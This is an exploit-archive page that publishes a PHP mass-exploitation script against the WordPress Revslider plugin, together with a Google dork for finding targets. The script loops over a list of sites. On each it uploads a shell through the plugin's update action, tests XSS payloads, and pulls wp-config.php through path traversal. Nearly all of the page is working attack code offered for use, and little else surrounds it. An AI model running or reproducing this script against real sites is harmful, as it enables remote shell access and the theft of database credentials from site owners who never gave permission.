what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Revslider Arbitrary File Upload / Download / XSS

WordPress Revslider Arbitrary File Upload / Download / XSS
Posted Jun 23, 2015
Authored by CaFc Versace

WordPress Revslider plugin suffers from cross site scripting and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss
SHA-256 | 36a172246b28821efbbddd74fa15559539df7db7fe943afe36e9ba491cdc5324

WordPress Revslider Arbitrary File Upload / Download / XSS

Change Mirror Download
#####################################################################################
# Exploit Title : WordPress Revslider Arbitrary File Upload, Download & Cross Site Scripting
# Google Dork : inurl:"/wp-content/plugins/revslider/"
# Date : 21-06-2015
# Exploit Author : CaFc Versace
# Vendor Homepage : http://revolution.themepunch.com/
# Tested on : Windows 7
# Contact : cafc.versace[@]surabayablackhat.org; me[@]dwisiswanto.my.id
#####################################################################################


# Exploit & PoC :
-------------------------------------------------------------------------------------
<?php
/** me@dwisiswanto.my.id **/

/******************************************
First, install PHP CLI
USAGE: php exploit.php list-of-target.txt
******************************************/

$cafc = array(
"file"=>"revslider.zip", // enter a ur shell file into a zip
"xss"=>"<marquee>CaFc Versace was Here", // for xss
"kfg"=>"..\wp-config.php" // for download config
);

function hajar($yuerel, $dataAing=null) {
$cuih = curl_init();
curl_setopt($cuih, CURLOPT_URL, $yuerel);
if ($dataAing != null){
curl_setopt($cuih, CURLOPT_POST, true);
curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
}
curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
$eks = curl_exec($cuih);
curl_close($cuih);
return $eks;
}

$site = @file_get_contents($argv[1]);
$tumbal = explode("\r\n", $site);
echo "Calculate the target list : " . count($tumbal);
if (!isset($site)) {
echo "Site N/A.";
} else {
foreach ($tumbal as $uri) {
echo "\n------------------------------------";
echo "\nTarget => " . $uri;
echo "\n";
$menta = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => "update_plugin",
"update_file" => $cafc['file'])
);
$jason = json_decode($menta, true);
if ($jason['success'] == false || $jason['message'] == "Wrong request") {
echo "\nExploit [update_plugin] => NOT VULNERABLE";
} else {
echo "\nExploit [update_plugin] => SUCCESS";
echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n";
}

$menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => "get_captions_css",
"data" => $cafc['xss'])
);
$jasonB = json_decode($menta2, true);
if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
echo "\nExploit [get_captions_css] => NOT VULNERABLE";
} elseif ($jasonB['success'] == true) {
echo "\nExploit [get_captions_css] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_ajax_action&";
echo "client_action=get_captions_css";
echo "data=" . urlencode($cafc['xss']) . "\n";
}

$menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => $cafc['xss'])
);
$jasonC = json_decode($menta3, true);
if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
echo "\nExploit [xss] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_ajax_action";
echo "client_action=" . urlencode($cafc['xss']) . "\n";
} else {
echo "\nExploit [xss] => NOT VULNERABLE";
}

$menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_show_image",
"img" => $cafc['kfg']),
$uri);
if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) {
echo "\nExploit [wp-config] => NOT VULNERABLE\n";
} else {
echo "\nExploit [wp-config] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_show_image";
echo "img=" . $cafc['kfg'] . "\n";
}
}
}
?>
-------------------------------------------------------------------------------------


# Credits :
-------------------------------------------------------------------------------------
CaFc Versace
Thanks : Agency CaFc - Surabaya BlackHat
-------------------------------------------------------------------------------------


./learn to be better
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close